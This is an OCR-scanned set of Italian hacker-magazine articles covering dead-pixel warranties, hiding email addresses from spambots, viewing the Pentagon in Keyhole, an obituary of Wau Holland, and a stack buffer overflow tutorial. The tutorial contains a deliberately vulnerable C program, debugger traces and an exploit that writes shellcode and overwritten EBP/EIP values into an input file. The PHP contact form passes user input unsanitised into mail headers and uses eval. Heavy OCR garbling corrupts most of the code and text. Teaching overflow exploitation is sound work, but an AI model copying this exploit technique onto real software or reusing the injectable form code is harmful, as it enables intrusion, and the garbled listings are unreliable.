Europa, va molto meno bene. Per il cam- 
bio di un monitor, Sony vuole cinque 
pixel difettosi. 
Giudizio: Occhio di pernice. 

UieujSonic: cattiva 
Sembra che i cinque pixel siano il valo- 
re della mediocrità di massa. Mediocre 
anche ViewSonic, insomma. 
Giudìzio: Occhio di bue. 




Calcoliamo i danni 



Esiste uno standard per quantifjcare 
esattamente il danno da pixel brucia- 
ti, basato su questa tabella: 

ClasseTypl Typ2 Typ3 



i 5D 

15Q 5DD 



Typ1: pixel sempre accesi. Typ2: pixel 
sempre spenti. Typ3: subpixel morti (tre 
subpixel fanno un pixel). La classe è quel- 
la di qualità dell'apparecchio. La Classe 
I è la più alta. In sostanza, i valori nume- 
rici indicano la tolleranza accettabile per 
ogni milione di pixel di quel tipo di errori 
su quella classe di prodotto. Le tabelle 
complete si trovano nella descrizione del- 
lo standard ISO 13406-2 : 2001 ma 
anche su vari siti, per esempio 
http://www.olidata.it/Supporto/GaranzieyT 
abella Normativa_Monitor.htm. ■ 



CHE COSA DOBBIAMO FARE? 



Chiediam. 



siano difetti. 



„^ f,~*~- . 



SE CI RITROVIAMO CON PIXEL BRUCIATI: 

© Verifichiamo a che classe appartiene l'apparecchio. 

© Verifichiamo sulle tabelle se il danno rientra nella tolleranza. 

© Verifichiamo attentamente la garanzia. 

O Se siamo oltre tolleranza, esigiamo la sostituzione. 



esempio tipico Apple) accettano quasi sempre di sostituire 
se il cliente alza la voce. 

© Informiamo e informiamoci presso un'associazione con- 
sumatori. 

© Se nonostante tutto siamo costretti a convivere con un pixel bru- 
ciato, proviamo a massaggiarlo con il dito, protetto da un panno in 
microfibra. Sembra strano, ma a volte funziona. 
© Soluzione estrema: impacchettiamo nuovamente il tutto, entro 
otto giorni, e riportiamo il monitor o il notebook a negozio e preten- 
diamo indietro i soldi. Andiamo in un altro negozio e acquistiamo lo 
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te* vincenti per fregare gli spanino! alla mena 



di Mirini di sui abusare sulle pagine Mi dei nostri siti 



indo un sondaggio del- 
mericano Center for 
Democracy and Technology 
(http://www.cdt.org), gran 
parte dello spam che ci arri- 
va è causato dalla presenza 
del nostro indirizzo su pagine Web. 
Qualcuno ha già iniziato a proteggersi e 
pubblica su Web il proprio indirizzo il 
meno possibile, o ricorre a trucchi come 
inserire una stringa NOSPAM oppure 
scambiare tra loro punto e chiocciola. Ci 
sono tuttavia altri sistemi, più ingegnosi 
e efficaci. 



I crawler maledetti 



Gli spammer rubano gli indirizzi di 
posta sul Web grazie ai crawler, let- 
teralmente nuotatori, anche detti spam- 
bot: programmi specializzati nel setac- 
ciare il contenuto di tutte le pagine Web 
che riescono a localizzare su Internet. Il 
loro funzionamento di base non è tanto 
diverso da quello che fanno i motori di 
ricerca per aggiornare i loro database. 
Un crawler stupido si lascia ingannare 
da trucchete come quelli sopra, ma i cra- 
wler sono sempre meno stupidi e non ci 
cascano più. 



Protezione 
JauaScript 



Un sistema più interessante è codifi- 
care il proprio indirizzo di posta den- 
tro la pagina Web in JavaScript. Se il 

crawler non è in grado di interpretare 



JavaScript (e molti non lo sono) l'indiriz- 
zo resterà al sicuro. Il codice è una cosa 
tipo questa: 



<SCRIPT LRNGURGE="JauaScript"> 



uar sin = "pippo"; 

uar des = "hackerjournal.it"; 

function link_a_postaO 
{ 

docurnent.ujrite("<R 
HREF=\"rnailto"); 

document.ujritef':" + sin + 
"@"); 

document.Lurite(des + "\">" + 
sin + "@" + des + "<\/a>"); 



</SCRIPT> 



La funzione qui sopra dovrà essere 
richiamata con un comando apposi- 
to, da mettere dove sulla pagina deve 
apparire il nostro indirizzo. Sulla pagi- 
na Web apparirà, prevedibilmente, pip- 
po® hackerjournal.it, ma nel codice 
HTML questo non sarà leggibile in alcun 
modo. La funzione può essere adattata 
per visualizzare l'indirizzo in modo non 
cliccabile. 



Form e sostan za 

Non basta ancora. Siamo ancora più 
sicuri se il nostro indirizzo di posta non 
appare del tutto, neanche in JavaScript 



JAVASCRIPT 

Questo codice Javascript deve andare 
esattamente al posto del link mailto 
tradizionale: 

<SCRIPT LRNGURGE="JauaScript" 
type="teHt/jauascript"> 

Iink_a_posta0 
</SCRIPT> 



Per esempio, i visitatori del nostro sito 
potrebbero scriverci usando un form 
HTML. Il form permette un anonimato un 
po' superiore al giusto per la sicurezza 
ma ci sono vari modi per riequilibrare le 
cose, come permettere un solo invio per 
IP per un certo tempo, acquisire gli indi- 
rizzi IP o filtrare l'HTML in arrivo. Ecco 
un esempio di form in linguaggio PHP: 
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HARD HACKING 



<?php 

//posizione della uariabile sendmail 
//almeno l'atìmin dourebbe conoscerla! 
$maif_path = "/usr/sbin/sendmail -i ~t"; 

//indirizzo cui arriueranno le email Dia form 
$mail_to = "pippo@hackerjournal.it"; 

//soggetto della mail 
$maii_subject = "Contact Form"; 

//sito contattato dal form, o nome dell'a- 
zienda 

$ragione_sociale - "Hacker Journal"; 

//codice html dBl form 
$fbrm_html - «Shtml = " 
<hl> 



Sragione-sociale: 



Per contattare 

</h1> 

<form 
action=A"$PHP_SELFV'method=\"postV , > 

<table 

class-V'maìnTeHtV border=\"0A" cellspa- 
cing=V5S"> 



<td>Nome: </td> 
<td>Snome</td> 

<td>lndirizzo email:</td> 
<td>$replg<td> 



<tr> 



</tr> 
<tr> 



</tr> 
<tr> 



<td 
colspan=V'2V' alìgn=S"centerV'>Messaggio</td> 

</tr> 



<tr> 



<td colspan = V'2\" 
align = \"cen- 
ter\">$messag- 
gio</td> 



colspah»\"2\* 
align = \"center\ 
">$send</td> 

</tr> 

</table> 

</form> 

Script by <a 
href- "http:/ 
/ ujujuj. hacker jour- 
nal.it">Hacker Jnur- 
nal</a> 



ini_set("sendmail_from", $mail_from); 
ini_set("sendmail_path", $mail_path); 

if (S-POST) 
{ 

lf($_PDST['userEmail'I) 
{ 

if(mail($meil_to,$mail_subject,"\t 
From: ".$_POSTJ'userName']."\n \t Email: 
".$_PDST['userEmail']. "\n\n\n\n".stripslas- 
hes($_POST['userMessage'D. 'questo messaggio 
e' stato creato da <a href ="http://uiujuj.hacker- 
journai.i t"> Hacker JournaK/a> Vs script,," Frnm: 
$_POST[user£mail]\rVn"."Reply-To:$_POST[use- 
rEmail]\r\n") ) 
1 
Shtml = 'Grazie per auere contattato 
'5ragione_sociale', 'iLPOSTt'userName'].'. <br AMessaggto 
inuiata! <br/>Script di <a 

href=' 5 httcc//LLiuJUJjTacl<erJoumalit , '>HackerJournaK/a>'; 
} 
else 



{ 



Shtml = 'Si e' uerificato un 



errore.'; 



{ 



Smessaggio = '< teHtarea name="user- 
Message" rou>s="20" cols="7D"x/tBHtarea>'; 

Snome = '<input type="teHt" 
name="userName" size="30">'; 

Sreply - '<input type="teHt" 
name="userEmail" size="30">'; 

Ssentì = '<input type = "submìt" 
name="submit" ualue="Send">'; 



eual($form_html); 



Un ultima 
consiglio (peroro) 



Gli spammer ricavano un sacco di 
indirizzi dai database WHOIS, 
quelli che contengono le registra- 
zioni dei domini. È bene magari 
giocarsi un indirizzo ma usarlo 
solo e unicamente per WHOIS, in 
questo modo, anche se gli spammer lo 
trovano, se ne fanno poco o niente. 

Nyarlathotep 
nyarlathotep@hockerjaurnal.it 



,?m-r 



A Hnche questa . 
un crawler, ma In fa la NHSR 
e gli unici siti che frequenta 
sana quelli di lancia. 






?> 



<html> 

<head> 

<title>/* un titolo qualsiasi */</title> 

</head> 

<body> 

<?=$html?> 

</body> 

</html> 



A / crawler sona programmi 
che strisciano per il Web a 
caccia bauosa di indirizzi 
email. Non facciamoglieli 
trouare. 
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Kerjournal.it 



INGEGNERIA SOCIALE 









I 



I 



// Pentagono: il centro della difesa americana, 
uno dei luoghi più blindati del pianeta. 
Hn diamo a scoprirlo con un programma 
che farà delle nostre ricerche di ingegneria 
sociale un'esperienza spaziale 



rima di tutto abbiamo biso- 
gno di un programma spe- 
ciale, che viene distribuito 
liberamente e che, in teoria, 
dura solamente sette gior- 
ni. Lo troviamo all'indirizzo 
http://www.keyhole.com/downloads/Key- 
holeLT172r3.exe. Dopo la registrazione, 
aperta la finestra principale, usiamo dei 
cursori in basso al centro per spostarci 
oppure del tasto destro del mouse sulla 
videata principale per alzarci, abbassar- 
ci e spostarci su tutto il globo. 

Sulla destra, individuiamo sotto il 
pulsante Tools -> Placemark -> North 
America -> United States -> Districi 
Of Columbia la città di Washington. 

Doppio clic sul nome e nella finestra prin- 
cipale inizierà il puntamento automatico. 
Appena sopra Washington, dobbiamo 
trovare il Pentagono. Non ci siamo mai 
stati, ma come tutte le grandi città nei 
mondo anche Washington ha una sua 
metropolitana ed è impensabile che non 
esista una fermata specifica per un posto 
dove lavorano migliaia di persone. Per 
vedere le linee metropolitane attiviamo 
la funzione Show Me -> Subway Lines, 
sempre nella zona sinistra della videata 
del programma. Tra parentesi, già che ci 
siamo: possiamo vedere perfino le piz- 
zerie italiane, funzionanti a Washington! 

Preso! Una fermata all'incrocio del- 
la linea blu con la gialla si chiama 
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sulla "i"m lassiamo 



alfor 



esattamente Pentagon. Avviciniamo- 
ci, usando del tasto destro e spostando 
il mouse. Arriviamo a una definizione di 
immagine spettacolare, che prevede la 
visibilità di particolari grandi circa un 
metro. Con il cursore Tilt ci spostiamo in 
modo da vedere l'edificio in prospettiva. 

Attiviamo anche il tasto Keyhole 
Community BBS, appena sopra quel- 
io che ci ha fatto vedere le linee del 
metrò. In centro al Pentagono appare 
una "i" in campo blu: sta ad indicare che 
possiamo scambiare con altri utenti del- 
le informazioni sul luogo. Un clic sulla "i" 
della mappa con il tasto destro e andia- 
mo direttamente al forum utenti, nel 
thread che parla del Pentagono. Qui un 
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SERVE UNA CONNESSIONE VELOCE 



uesta è la volta buona per convincere i genito- 
ri a comprarci l'adsl: delle ricerche di geogra- 
fia a questo livello non le hanno mai viste! 

Se tentiamo la connessione di Keyhole con un 
modem a 56 K rischiamo di rimanere frustrati per 
tutta la vita...: non ne vale la pena, anche se il ten- 
ativo possiamo sempre farlo. 
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partecipante ci suggerisce di andare a 
visitare il Pentagono dall'interno, tramite 
una visita guidata virtuale, all'indirizzo 
http://www.defenselink.mil/pubs/penta- 
gon/fullvideo56.ram 

Lo faremo, ma prima vogliamo vedere la 
foto da satellite successiva ai paurosi 
attentati dell' 1 1 settembre 2001 . Un sal- 
to all'indirizzo http://www.spaceimaging. 
com/galIery/9-1 1/default.htm# ci consen- 
te di confrontare un'immagine satellitare 
con quanto stiamo guardando tramite 
Keyhole. Impressionante, possiamo gira- 
re l'immagine di Keyhole in modo da ave- 
re esattamente lo stesso orientamento 
e la stessa dimensione dell'immagine 
statica presa dal satellite. 

Ci viene subito voglia di andare a 
vedere altri posti , se abitiamo a 



Roma anche la nostra casa... ma 

abbiamo tempo per esplorare anche altre 
aree misteriose e affascinanti, come l'A- 
rea 51 , o le più discusse e sperdute iso- 
le in mezzo all'oceano atlantico, in alcu- 
ni casi diventate depositi di scorie radioat- 
tive. Abbiamo il mondo a nostra disposi- 
zione! tà 
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luglio 2001 : si riunisce il 
gruppo hacker olandese 
HAL 2001 . Un applauso: è 
l'intero gruppo che onora 
Wau Holland, prematura- 
mente scomparso due set- 
timane prima. Chi presiede quella manife- 
stazione celebra "il suo fondamentale con- 
tributo alla causa dell'hacking". 



Chi 



era 



Wau Holland? 

Una figura carismatica e attiva, pre- 
tore di un'infinità di iniziative e prol 
nista di innumerevoli battaglie negli _ 
70. Nasce nel 1951, un ragazzo che ha 
una convinzione non comune: studiare, 
approfondire e laurearsi. Ci riesce in anni 
molto particolari e delicati: gli anni delle 
dure contestazioni e delle agitazioni che 
investirono un po' tutta l'Europa. Durante 
gli anni universitari, Herwart Holland conia 
il suo "handle": WAU. Lo pseudonimo rap- 



presenta l'incipit della parola "Maulwurf" 
che significa letteralmente "talpa". ™' ' 
stato attribuito dai suoi colleghi ch( 
vano in lui spiccate capacità tecn 
interpersonali. Una intuizione piì 
confermata. 
La sua operosità è legata fortemente al 
Chaos Computer Club, un gruppo di atti- 
visti fondato insieme a Steffen Wernery 
durante un incontro causale nella reda- 
zione di un giornale locale per il quale 
Wau scriveva. La nascita ufficiale del Club 
avviene nel 1984 con una inaugurazione 
nella libreria Schwarzmarkt a cui parte- 
ciparono un discreto numero di persone. 
La convinzione di Wau circa l'importan- 
za e le potenzialità del computer lo spin- 
ge a promuovere una serie di progetti che 
presto confluiscono nell'hacking. Il grup- 
po si amplia e Wau si fa portavoce del 
principio portante già espresso daglf u 
ker del MIT qualche decennio addii 
divulgazione libera e illimitata delle infor- 
mazioni. Da qui, per Wau e i membri del 
CCC, hacking equivale a missione prima 
sociale, poi politica. 



Il primo grande 



Per dare forza alla propria parola, Wau ela- 
bora, insieme a Wernery, un clamoroso exploit 
contro il BTX, un sistema telematico di infor- 
mazioni che aveva intenzione di monopolizza- 
re i servizi informatici nel paese. Wau pa 
rà circa tre mesi nella raccolta di informazio- 
ni sui computer della BTX e il lavoro è proficuo: 
individua infatti un baco che sfrutta a puntino. 
Decide di connettersi all'Hamburger Sparkas- 
se, la cassa di risparmio di Amburgo e di buca- 
re un elaboratore in modo che questo si con- 
netta alla BTX continuamente. Lesperimento 
riesce. Alla Hamburger Sparkasse venne 
recapitata una bolletta salatissima e Wau, in 
una conferenza stampa, spiegò a tutti cosa 
aveva fatto, e perché, riscuotendo un succ" 
so enorme non solo in Europa. Questo, ( 
è il primo hack messo a punto dal CCC, , 
tò in trionfo il gruppo che diventò il faro per 
l'hacking europeo. Iniziano però i problemi. 
Wau, che rimane in attività di hacking e un 
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attento divulgatore scientifico, perde il control- 
lo del CCC che si macchia di hacking oscu- 
ro. Nel 1 987 alcuni membri compromisero la 
sicurezza informatica della NASA scatenan- 
do un putiferio giornalistico. La "talpa" risolve- 
rà la delicata situazione mostrando alla NASA 
i metodi per migliorare la propria politica di 
sicurezza. Intanto un'altra pesante ombra si 
abbatte sulla sua attività. 



Starle e misteri ancora impenetrabili). 

89 alcuni exploit del CCC vengono L'ìnSegnamentO 

collegati al KGB, specialmente quelli che g Jdld e COflClUSiO 

no ai sistemi militari americani. Una spy- 

molto intrigante che ha ispirato nume- 



tedeschi dell'Est e tedeschi dell'Ovest dopo 
il crollo del Muro di Berlino. Decide poi di tra- 
sferirsi a Jena, storica università tedesca, per 
insegnare "new technologies" con la sua 
usuale dedizione. Durante i suoi insegna- 
menti, il CCC subisce una nuova stangata: 
I viene trovato morto Tron, un famoso hacker 

dotato di ottime capacità, in circostanze che 
farebbero pensare ad una "eliminazione com- 
I merciale". Al suo nome infatti era legata la 
scoperta di codici per violare smart-card e 
periodo Pengo (Hans Hubner) e Hagbard pay-tv. Dopo l'ennesimo lutto, Wau decise 
(Karl Koch, ritrovato morto in circostanze di concentrarsi nell'insegnamento e nella 

divulgazione scientifica tralasciando l'hac- 
king tecnico. Nei primi giorni di luglio del 2001 
cade in un coma da cui non si svegfierà mai 
più. Ha tinto la sua vita di colori intensi come 



le sue attività, riuscendo a superare innume- 
revoli difficoltà. Chi lo ha conosciuto parla di 
un uomo solare con spiccate doti intellettive, 



rticoli e libri, ma che ha fatto infuriare il Nell'ultimo decennio, Wau si dedica capace di una compagnia instancabile. Ti 

uon Wau convinto che chi è impelagato in soprattutto al proselitismo e alla pubbli- salutiamo così anche noi, Wau, "talpa dell'- 

( uesti problemi non abbia il diritto di essere cazione di numerosi articoli a carattere hacking"! 

chiamato hacker. Rivendicò la scientificità del- etico-scientifico. Diventato presidente ono- 

l'hacking e rinnegò l'illegalità di determinate rario del gruppo riuscirà in un'operazione Rione Sparrouj 

ttività. Personaggi misteriosi sono in questo delicatissima: far convivere pacificamente kikacorsentinn@email.it 
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miao 
nato satta ambiente Una, 
poiché ornata 



ora II Buttar Overflow 

crea danni a destra 

e a maona som esclusioni: 



Windows, , 
lima, SuallS! 



I Buffer Overflow è diventato col 
tempo una delle forme di aggressio- 
ne informatica più utilizzate e dan- 
nose per i sistemi. Quando si verifica 
■ un buffer overflow in una applicazione, 
sembra che l'applicazione abbia subi- 
to un errore innocuo, che al massimo può 
causare la chiusura del programma, ma in 
realtà un aggressore capace di sfruttare 
questa tecnica può benissimo iniettare a 
suo piacimento un codice di qualsiasi gene- 
re all'interno del programma! Ovviamente 
in questo modo si può benissimo prende- 
re possesso del PC attaccato. In sostanza 
il buffer overflow è soltanto un problema 
legato alla cattiva scrittura del codice da 
parte del programmatore e da una man- 
canza di controlli del sorgente. Analizzia- 
mo uno dei buffer overflow più comuni e 
anche uno dei più semplici: lo "stack based 
overflow"! C'è da precisare che esistono 
altri tipi come: heap overflow, trame pon- 
ter, adjacent memory ecc.. 



Il buffer altro non è che una preserva- 
zione di una certa zona della memoria 
(allocazione) attraverso l'assegnazio- 
ne di un indirizzo che segnala ad un 
programma dove risiede l'area di 
memoria destinata al contenimento di 
certe informazioni. 

Si ottiene l'overflow quando i dati scritti nel 
buffer superano i limiti imposti, andando 
anche ad alterare il codice in esecuzione, 
modificando il flusso di istruzioni a "dirot- 
tandolo" su altre istruzioni inviate dall'e- 
sterno! 

Un programma in runtime può essere 
distinto in strutture logiche: il codice viene 
generalmente caricato in testa alla memo- 
ria e contiene le istruzioni in linguaggio 
macchina da far eseguire sulla CPU; poi 
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segue I area in cui sono contenute le varia- address). Il return address è molto impor- 



stringhe di testo, vettori di dimensione 
ecc.. 

Il resto della memoria viene gestita diret- 
tamente al momento dell'esecuzione del 
programma e si divide (ovviamente a livel- 
lo logico) in "Heap" e "Stack". 
Detto semplicemente: 
HEAP= usato per gestire le variabili dina- 
miche e i puntatori; 

STACK= usato per salvare lo stato dell'e- 
secuzione o per passare i parametri per 
argomento. 



zione nel punto in cui era stata stoppata! 
Questa sbrigativa spiegazione dello stack 
può farci capire una cosa: un eventuale 
dirottamento del return address (salvato 
nello stack) impedisce al programma di 
ritornare in runtime correttamente, e cau- 
serà quindi un crash dell'applicazione! 

Ora vediamo qualche esempio concre- 
to utilizzando il nostro bel compilatore 
(nel nostro caso Visual C++). 

Per iniziare cominciamo a creare un pro- 
gramma in C++ nel cui main() sia presen- 



Assembly, il PUSH e il POP, che rispet- 
tivamente memorizzano ed estraggo- 
no un dato. La gestione dello stack è inve- 
ce affidata a due registri 32-bit chiamati 
EBP e ESP (Base e Stack Pointer) che 
rispettivamente delimitano la cima e il fon- 
do dello stack. Questa struttura dello stack 
è perfetta per gestire le chiamate di fun- 
zioni e procedure, poiché il sistema opera- 
tivo in uso deve essere in grado di control- 
lare tutte le chiamate eseguite e deve esse- 
re capace di tornare a punti prestabiliti del 
programma in caso di necessità! Quando 
si effettua una chiamata a funzione si uti- 
lizza un istruzióne Assembler di tipo CALL, 
che serve per stoppare il programma a 
quel punto e per passare il controllo alla 
funzione chiamata, dopo aver salvato lo 
stato corrente e l'indirizzo di ritorno (return 



f() ) in cui inseriamo un buffer di 10 byte), 
ecco il sorgente: 



//sorgente HJl.cpp 

int f(int a, intb) 

{ 

char bufilo]; 

int ris, 

ris=a+b; 

return ris; 

} 

uoid main() { 
f(3;2); 

} 



Ora analizziamo cosa succede nello stack: 
compiliamo il programma ed andiamo suc- 
cessivamente ad analizzare l'applicazio- 



ne creata (HJ1 .exe) con un Debugger. 
Chi possiede Visual C++ può aprire l'ese- 
guibile direttamente con Visual Studio che 
fungerà come un vero e proprio debugger. 
Allora analizziamo il risultato ottenuto step 
bystep. 



c'è la chiamata alla funzione 



f(» 



// 

[...1 

0040 1078 PUSH 2 //richiama il para- 
metro 2 
0040 107R PUSH 2 //richiama il para- 

! metro 3 
OD40107C CRLL@ILT+0(fH00401005) 

j //richiama la funzione f 

//funzione 

00401020 PUSH EBP //salua il ualo- 
! re di ebp 

00401021 M0UEBP,ESP //allinea ebp 
00401023 SUBESP.50H 

00401026 PUSH EBH //salua lo sta- 
to dei registri 

00401027 PUSH ESI 

00401028 PUSH EDI 

00401058 M0U ERK,DUI0R0 PTR 
IEBP+B] //carica il primo numero 

0040103B RDD EHK,DUJDRD PTR 
[EBP+OCHJ //esegue la somma del 
secondo numero 

0040103E M0U DUJ0RD PTRIEBP- 
10H],ERH 

00401041 M0UEflH,DLU0RDPTR[EBP- 
IflHl //memorizza il risultato in EBH 

00401044 POP EDI //ripristinai 
! registri saluati precedentemente 

00401045 POP ESI 
D0401046 POP EBH 

00401047 M0UESP,EBP //ripristina 
lo stack 

004D1D49 POP EBP 
0040104R RET //ritorna al chiaman- 
te 

Quando c'è la chiamata a f() si nota- 
no ì due PUSH che memorizzano i 
ualori 3 e 2, impostati nella mainO, 
nello stack. 

La CRLL che chiama la funzione ser- 
uè per saluare nello stack l'offset (il 
registro EIP) e saltare all'indirizzo 
di f(). Lo stack dopo la chiamata ad 
f() aura questo schema: 

A STRCK 

12 

13 

I 40107C (return address) 

IEBP 



^BH 






Dopo aver compreso il funzionamen- 
to dello stack, possiamo passare alla 
creazione vera e propria di un over- 
flow. Per fare ciò prendiamo in considera- 
zione il seguente listato in C++: 



//sorgente HJ2.cpp 
#include<stdio.h> 

uoid maìnUnt argc, char **argu) { 

char buf [20]; //creiamo il buf e 
impostiamolo su 20 byte 

FILE*f=N0LL; 

int i=0; 

printf("\nfluffer Ouerflouj by mou- 
se"); 

f=fopen("input.tHt","rb"); //apria- 
mo il file input. t«t 
ujhile(!feof(f)){ 
buf[i]=fgetc(f); 
i++; 



} 



Allora questo listato è un semplicissi- 
mo esempio di buffer overflow causa- 
to dall'uso di un buffer nella lettura da 
file.ll file letto lo creiamo noi: nominiamo 
un comunissimo .txt come input e inseria- 
mo nel txt la seguente riga: 

RRRRBBBBCCCCDDDDEEEEFFFFGGGG 

Il file è composto da 20 + 8 bytes, il listato 
HJ2.cpp non fa altro che leggere un carat- 
tere alla volta del file input.txt inserendo poi 
il tutto nella variabile "buf" ; 
Ovviamente la lettura del file (che supera di 
8 byte la variabile "buf") non può che cau- 
sare un overflow, per evitarlo dovremmo met- 
tere un controllo sull'immissione di byte. 
Dopo aver mandato in crash il programma 
facciamo un controllo con il nostro Debug- 
ger: noteremo che il valore di EIP è 
0x47474747 (che corrisponde alla stringa 
GGGG); il valore di EBP è 0x46464646 (che 
corrisponde alla stringa FFFF). 

Ovviamente notiamo così che i valori del- 
l'input sono andati a sovrascrivere il valo- 
re dello stack, cancellando i salvataggi 
precedenti, tra cui il return address e il 
base pointer (EBP). 

Per realizzare un exploit che sfrutti questo 
overflow (il reale scopo di un eventuale malin- 
tenzionato che si interessa déll'overflow), 
dobbiamo andare ad analizzare l'esecuzio- 
ne dell'applicazione HJ2.exe fino all'over- 
flow, utilizzando la comodissima opzione 
Step By Step del compilatore. Le prime strin- 
ghe generate sono superflue: altro non sono 
che routine imposte dal compilatore. Andia- 



mo ad analizzare il main che inizia con la 
chiamata CALL all'indirizzo 401000. 



EIP=401000 ESP=12FFB4 EBP=12FFC0 

00401000 P0SH EBP //salua l'EBP 
nello stack 

00401001 M0U EBP,ESP 
00401003 SUB ESP,1Ch //riserua del- 
lo spazio per la uariabile "buf" 
00401006 M00 DOJORD PTB[EBP-lBh],0 

!//uariabile FILE* f" 
00401000 M0U 00J0RD PTR[EBP-1Ch],0 
//riserua spazio per la uariabile "ìnt 
i" 
EIP=401D14 ESP=12FF64 EBP=12FF80 



Come visto questa prima parte di codice 
serve per riservare lo spazio destinato alle 
variabili che abbiamo impostato nel lista- 
to HJ2.cpp e sono inoltre inseriti i valori 
dello stack EBP e ESP prima e dopo l'e- 
secuzione delle istruzioni scritte. 



!PTR[ERH+0Clì] 
0040103CRNDECH,10h 
0040 103F TEST ECH,ECH 
0040104 UNE 00401061 
00401043 M0U EDK,DUJ0R0 PTR[EBP- 
18h] 

00401046 PUSHEDK 

00401047 CRLL D04010C7 //legge il 
filedafgetcO 
0040104CESP,4 

0040104F ECH,D0J0RD PTR[EBP-1Ch] 
00401052 BYTE PTR[EBP+ECH-14h],al 

| //memorizza il byte dentro la uaria- ! 
I bile "buf" 

00401056 M0U EDH,D0J0RD PTRIEBP- 

IChl 

0040 1059 HDD EDK, 1 //esecuzione del- 
| la stringa i++ 

0040105C M00 DUJ0R0 PTRIEBP- 

1Ch],E0H 

0040105FJMP 00401036 //esecuzio- 
ne del ciclo 




-PI X? 



Si è verificato un errore in HJ2.exe. L'applicazione verrà 
chiusa. 



Potrebbe essersi verificata la perdita dei dati su cui si stava lavorando. 



Segnalazione del problema a Microsoft 

È stata creata una segnalazione errori che è possibile inviare. Il contenuto della 
segnalazione sarà riservato e anonimo. 



Per visualizzare i dati contenuti nella segnalazione errori fare clic qui 



Invia segnalazione errori Non inviare 



Proseguiamo... 



00401014 P0SH 407030h //stringa 
'NnBuffer Ouerflouj by mouse" 
00401019 CRLL 00401114 //esegue 
ia stringa printfO 
0040101ERDD ESP,4 



Questa semplice porzione serve per sal- 
vare nello stack la stringa di testo, poi vi è 
la chiamata a printfQ. Ora andiamo ad ana- 
lizzare ia porzione di codice che esegue il 
ciclo while, in cui vengono letti i byte dal file 
input.txt e memorizzati nella variabile "buf": 



00401033 M0U D0J0RD PTRIEBP- 
|18h],ERH 

00401036 MOLI ERK,DUJ0R0 PTRlEBP- 
|1Bh] 

00401039 M0U ECH, DWORD 



Questa semplice parte esegue la lettu- 
ra dell'input e l'esecuzione del ciclo whi- 
le, per cui niente di particolarmente inte- 
ressante. La parte che interessa a noi è 
quella che segue: 



00401061 MDU ERR,00J0RD PTR[EBP- 
IBh] 

00401064 POSHERR 

00401065 CRLL 00401071 //fcloseO 
D040106RRD0ESP,4 

00401060 M00ESP,EBP 

0040106FPOPEBP //qui si ripristina 

l'EBP 

00401070 RET //istruzione di rit 



Questa diciamo che è la parte scottante, 
nella parte seguente dalla istruzione fclo- 
seO vi è il ripristino del registro EBP e l'e- 
secuzione dell'istruzione di ritorno (RET). 
Quest'ultima istruzione serve per estrarre 
una word di 32-bit dallo stack per salvarla 



in EIP, modificando l'indirizzo dell'istruzio- 
ne corrente spostando quindi il flusso di 
runtime dell'applicazione. Qua avvengono 
i problemi che causano l'overflow, infatti il 
ciclo while non si accorge di inserire nel 
buffer più dati di quelli prestabiliti (ne inse- 
risce 28 invece di 20) e di conseguenza, 
non avendo più spazio, comincia a scrive- 
re sullo stack, cambiando i valori presenti 
su di esso. Tutto questo viene tradotto con 
un errore che scatta nel momento di ese- 
cuzione delle istruzioni POP e RET: i valo- 
ri che vengono estratti dallo stack non sono 
più quelli corretti, ma sono diventati quelli 
letti da input.txt: quando avviene il crash 
leggiamo che i registri EBP e EIP conten- 
gono i valori 0x46464646 e 0x47474747, 
che come abbiamo visto corrispondono 
alle stringhe FFFF e GGGG presenti in 
input.txt. 



usiom 



Possiamo benissimo controllare l'an- 
damento del programma fornendo un 
input in eccedenza, ma se vogliamo esa- 
gerare possiamo fornire istruzioni 
Assembly a nostro piacimento, al posto dei 
caratteri di testo (AAAABBBB...); possiamo 
quindi iniettare il nostro codice direttamen- 
te nello stack del programma e modifica- 
re il runtime dell'applicazione a seconda 
dei nostro codice! Questa parte però è 
"personale" poiché ognuno sfrutta l'over- 
flow e il relativo exploit come meglio cre- 
de... Inseriamo qui di seguito un listato per 
cambiare il flusso di HJ2.exe con questo 
nuovo codice, inserendo la scritta 
"EXPLOIT WORKS" dopo "Buffer Overflow 
by mouse" (scritta in HJ2.exe). 



//sorgente eup.cpp 

^include <iostream.h> 

#include<stdlib.h> 

#include<stdio.h> 

int mainO 
.{ 

char codel[9l= "\hB3\hEC\h2D\h68\h 

88\hFF\h12\hB0"; //SUB ESP,Bh2B + 
jPUSHoffset(str) 

char 
|code2[6]="\HEB\K9B\HlT\H2B\HDB"; 
i//CRLLprintfO 

char 
nop[Bl="\H9B\H9a\HgB\H9B\HgB\H9B 
\k90"; //7hNDP 

ì char ebp[5l="\KBB\KFF\Hl2\H0D"; 
7/EBPualue 

| char eip[5]="\H6C\HFF\Hl2\HDB"; 
|//EIPualue 

char str[17]="\nEHPL0IT 
ILIQRKSMXhOO"; //nuli string 




FILE*fd=NULL; 
fd=fapen("input.tHt","ujb"); 
ìnt i; 

for(i = B;i<8;i + + ) 
|fprintf(fd,"%c",code1[i]); 

for(i = 0;i<5;i + + ) 
jfprintf(fd,"7oc",code2[i]); 

for(i = 0;i<7;i + + ) 
;fprintf(fd,"%c" 5 nop[iJ); 



II buffer auerflaw 

è soltanto 

un problema 

legato alla cattiua 

scrittura del codice 

da parte 

del programma tore 

e da una mancanza 

di controlli 

del sorgente 



Buffer Ouerf loui by mouse 
EXPLB IT WORKS!! 

Per concludere, illustriamo il metodo per 
proteggere le nostre applicazioni da even- 
tuali overflow (come in questo caso da let- 
tura di file). Se noi utilizziamo questo pic- 
colo accorgimento nel sorgente di HJ2.cpp 



strncpyfbuf, sizeof(buf), 



for(i = 0;K4;i + + ) jptr); //questo è sicuramente mol- 
jfprintf(fd,"%c",ebp[i]); jto più sicuro! 

for(i=fl;K4;i + + ) 



!fprintf(fd 5 "7oC",eip[i]); 

for(i = D;i<16;ì + + ) 
[fprintf(fd," , 7oC",str[iI); 

fclDse(fd): 
system("PHUSE"); 
return 0; 



Se inseriamo nella stessa cartella HJ2.exe 
e EXRexe e proviamo a lanciare HJ2, note- 
remo che l'espioit funziona e in output tro- 



al posto di 

strcpy(buf,ptr); //insicuro 
come codice! 



è sicuramente molto più affidabile, perchè 
controlliamo la grandezza dell'input mas- 
simo della variabile "buf" evitando in que- 
sto modo di scrivere sullo stack e di gene- 
rare quindi il noioso errore creato dall'o- 
verflow! 
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da formul, 
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I primo passo è banale, ma sen- 
za non potremmo combinare 
granché: apriamo il nostro brow- 
ser all'indirizzo http://www.dslre- 
ports.com/tweaks. Tweaks significa 
qualcosa come "sintonia fine" e in 
questo caso è proprio quello che ci ser- 
ve per regolare al meglio la nostra con- 
nessione a Internet. 

Teniamo aperto solamente il browser, 
senza che ci sia un'altra applicazione o 
